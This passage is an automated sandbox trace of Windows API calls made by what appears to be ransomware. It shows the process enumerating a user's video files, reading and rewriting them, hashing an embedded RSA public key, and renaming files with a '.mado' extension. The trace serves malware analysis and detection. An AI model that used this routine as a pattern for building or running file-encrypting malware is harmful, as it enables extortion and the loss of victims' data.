[0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b18 [0206.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79aa0 | out: hHeap=0x2c0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ae8 | out: hHeap=0x2c0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b18 | out: hHeap=0x2c0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72db0 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72ec8 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79aa0 | out: hHeap=0x2c0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ad0 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b00 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a88 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66f18 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.174] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x43af, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x43af, lpOverlapped=0x0) returned 1 [0206.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0206.174] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x43b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.174] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0206.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.174] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.174] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.174] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.174] CloseHandle (hObject=0x63c) returned 1 [0206.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0206.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b7b950 [0206.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77968 | out: hHeap=0x2c0000) returned 1 [0206.175] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\IOfrA6qSZ60.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\iofra6qsz60.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\IOfrA6qSZ60.flv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\iofra6qsz60.flv.mado")) returned 1 [0206.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.176] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0206.177] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdae2f400, ftCreationTime.dwHighDateTime=0x1d5e734, ftLastAccessTime.dwLowDateTime=0xabee89d0, ftLastAccessTime.dwHighDateTime=0x1d5e29c, ftLastWriteTime.dwLowDateTime=0xabee89d0, ftLastWriteTime.dwHighDateTime=0x1d5e29c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MHAzaa", cAlternateFileName="")) returned 1 [0206.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0206.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bf70 [0206.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.177] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebaa4580, ftCreationTime.dwHighDateTime=0x1d5e393, ftLastAccessTime.dwLowDateTime=0xba12dd10, ftLastAccessTime.dwHighDateTime=0x1d5e515, ftLastWriteTime.dwLowDateTime=0xba12dd10, ftLastWriteTime.dwHighDateTime=0x1d5e515, nFileSizeHigh=0x0, nFileSizeLow=0x16f9f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oCeAcW.flv", cAlternateFileName="")) returned 1 [0206.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0206.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.178] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\oCeAcW.flv") returned=".flv" [0206.178] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\oCeAcW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\oceacw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.178] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=94111) returned 1 [0206.178] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.180] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16f79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.180] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.182] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.182] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x16f9f, lpOverlapped=0x0) returned 1 [0206.183] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.183] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.183] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.183] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0206.184] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.184] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.184] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.184] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.184] GetLastError () returned 0x0 [0206.184] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.184] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0206.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.184] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.184] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.184] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16fa0) returned 0x3b81690 [0206.185] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66f18 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66f60 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a88 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ab8 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b00 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ad0 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0206.185] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ad0 | out: hHeap=0x2c0000) returned 1 [0206.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b00 | out: hHeap=0x2c0000) returned 1 [0206.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b00 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79ad0 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79ab8 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72c98 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72db0 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ad0 | out: hHeap=0x2c0000) returned 1 [0206.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b00 | out: hHeap=0x2c0000) returned 1 [0206.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.187] GetCurrentThreadId () returned 0x600 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff6b8 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.187] GetCurrentThreadId () returned 0x600 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0206.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0206.188] RtlAllocateHeap 